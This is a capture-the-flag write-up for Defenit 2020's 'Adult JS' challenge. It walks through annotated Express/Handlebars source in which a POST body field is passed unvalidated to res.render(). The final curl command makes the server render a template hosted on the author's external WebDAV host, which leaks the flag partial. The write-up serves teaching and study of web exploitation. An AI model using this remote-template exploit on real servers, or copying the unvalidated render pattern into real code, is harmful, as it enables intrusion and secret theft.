
We are given a huge chunk of source code (abridged here):
```
const express = require('express');
const child_process = require('child_process');
const fs = require('fs');
const bodyParser = require('body-parser');
const cookieParser = require('cookie-parser');
const assert = require('assert');
const hbs = require('hbs');
// Application setup: create the Express app, load the flag, and register middleware.
const app = express();

// The flag file is read once at startup and registered as a Handlebars partial
// named 'FLAG'. A registered partial can be included with `{{> FLAG}}` from any
// template this engine renders, so the secret is only as well protected as the
// set of templates the application can be made to render.
const FLAG = fs.readFileSync('./flag').toString();
hbs.registerPartial('FLAG', FLAG);

// hbs renders the views; 'html' is the default view extension.
app.engine('html', hbs.__express);
app.set('view engine', 'html');

// Hard-coded string: passed to cookie-parser below as the cookie signing secret
// and copied into several object literals inside the route handlers.
var shared = 'ADULT/JS';

// Body parsing for URL-encoded forms and JSON. `extended: true` selects the
// parser that accepts nested objects and arrays, so body fields are not
// guaranteed to be plain strings.
app.use(bodyParser.urlencoded({
extended: true
}));
app.use(bodyParser.json());
// Populates req.cookies; `shared` is only used for signed cookies.
app.use(cookieParser(shared))

// Landing route: replies with a fixed string and reads nothing from the request.
app.get('/', (_req, res) => res.send('It Works! Test'));

// GET /assert: answers 'Success' only when the `code` query parameter is truthy.
// assert() throws an AssertionError otherwise; this handler has no try/catch,
// so that failure is left to Express's error handling.
app.get('/assert', ({ query }, res) => {
  const { code } = query;
  assert(code);
  res.end('Success');
});

// Generated-looking handler with no request-controlled sink. It copies request
// properties into variables that are assigned without declaration (implicit
// globals unless the file runs in strict mode) and builds values that are not
// used again in the visible code. The only response call in the try body is
// res.attachment() with the constant string 'b1866791b'.
app.post("/b11a993461d7b578075b91b7a83716e444f5b788f6ab83fcaf8857043e501d59", (req, res) => {
try {
// Request-derived values: each line reads one property of an Express request field.
ccb89895c = ~~req.route.abccce745;
d831e9a8b = !req.secure.c47fe290a;
d88099c64 = !req.ips.g1da192b8;
d892c4194 = req.params["icacd6e65"];
ebfc3a2da = req.params["ea11668e6"];
h4ab88f09 = req.ip["a6ba6da09"];
h774a9af1 = [req.query.f4cac3da2];

// Constants, buffers and object literals holding `shared` and `this`.
// Buffer.allocUnsafe() returns memory that is not zero-filled; neither buffer
// is written to the response in this handler.
a63d8887e = 'c8cd0961a';
i606199e5 = 'b1866791b';
ddb64ecbe = Buffer.allocUnsafe(62);
bc8955df0 = {
g563f3740: shared,
a9928c724: this
};
d1112ec75 = 'add19ffe0';
i25dfc5b5 = Buffer.allocUnsafe(11);
i7d8af237 = {
b7431e336: this,
f2237285c: shared
};
hb3d60584 = {
hab2352d6: this,
bf89f18ae: shared
};
d88099c64 = d88099c64.d52434cec
d831e9a8b = d831e9a8b ** d831e9a8b
// NOTE(review): if req.ip is a string, h4ab88f09 is undefined at this point and
// the property read below throws, sending the request to the catch branch. Confirm.
h4ab88f09 = h4ab88f09["d1506a671"]
ccb89895c = ccb89895c ** ccb89895c

// Replaces the 11-byte buffer with a string; the result is not used afterwards.
i25dfc5b5 = /bb61465f5/.source + '//' + JSON.stringify(h4ab88f09);

// The attachment filename is the constant assigned above, not request data.
res.attachment(i606199e5);
} catch {
// Any exception in the body is reduced to a generic 'Error' response.
res.end('Error');
}
});

<snip>
// Start the HTTP server on port 8081 (no host argument is passed).
app.listen(8081);
```

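Among these endpoints, we can identify one that passes a value taken straight from the request body (`hcda7a4f9`) to `res.render`, which allows us to render an arbitrary template; the only other requirement is that the `i77baba57` cookie is set to a non-empty value: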
```
// Handler whose final call is the security-relevant one: the view name given to
// res.render() is taken from the request body without any validation.
// Variables are assigned without declaration (implicit globals unless the file
// runs in strict mode); most of them are not used again in this handler.
app.post("/61050c6ef9c64583e828ed565ca424b8be3c585d90a77e52a770540eb6d2a020", (req, res) => {
try {
// View name: POST body field `hcda7a4f9`, as parsed by the body-parser middleware.
ae97ef205 = req.body.hcda7a4f9;
c43c4f0d2 = req.get("d28c3a2a7");
dd0372ef0 = req.range("g64aa5062");
// Read from req.cookies, which holds the unsigned cookies, so the cookie
// signing secret plays no part in this value.
f71f5ce80 = req.cookies.i77baba57;
ic9e2c145 = req.secure["eb4688e6f"];

// Filler values: object literals, buffers and nested arrays that are not read again below.
fc4ebc0cc = {
b13a9706f: Function,
f635b63db: 15
};
ae9a8c19f = {
h4f3b2aa1: shared,
cf479eeba: this
};
h4a0a676e = Buffer.alloc(26);
h9b2a10f7 = Buffer.allocUnsafe(73);
f8c4d94cc = [
[
[
[{
cbee7d77b: this,
e21888a73: shared
}]
]
]
];
dffbae364 = {
f13828fc5: Function,
cbcc2fbc6: 22
};
ib4cb72c9 = {
hdd2f9aa3: Function,
he404c257: 59
};
hf494292b = 'f7de2a815';

// Only gate before rendering: the cookie value must be truthy, otherwise
// assert() throws and the catch branch answers 'Error'. This is a presence
// check, not authentication.
ae9a8c19f = assert(f71f5ce80);

// Request-controlled view name reaches the template engine. Express resolves
// the name to a template file, so the caller decides which file is rendered,
// and every rendered template can include the registered FLAG partial.
// A safer handler maps the input onto a fixed allow-list of view names and
// never passes request data to res.render() as a path.
res.render(ae97ef205);
} catch {
// Any exception in the body is reduced to a generic 'Error' response.
res.end('Error');
}
});
```

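Because the flag was registered at startup as the Handlebars partial `FLAG` (`hbs.registerPartial('FLAG', FLAG)`), any template the application renders can include it. We can then host a template containing `{{> FLAG}}` on a WebDAV server and have the endpoint render it for the flag: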
```
$ curl "http://adult-js.ctf.defenit.kr/61050c6ef9c64583e828ed565ca424b8be3c585d90a77e52a770540eb6d2a020" --data "hcda7a4f9=\\\\justins.in@8181\\index" --cookie "i77baba57=a"
Defenit{AuduLt_JS-@_lo7e5_@-b4By-JS__##}
```

Original writeup (https://blog.justins.in/defenit2020#adultjs).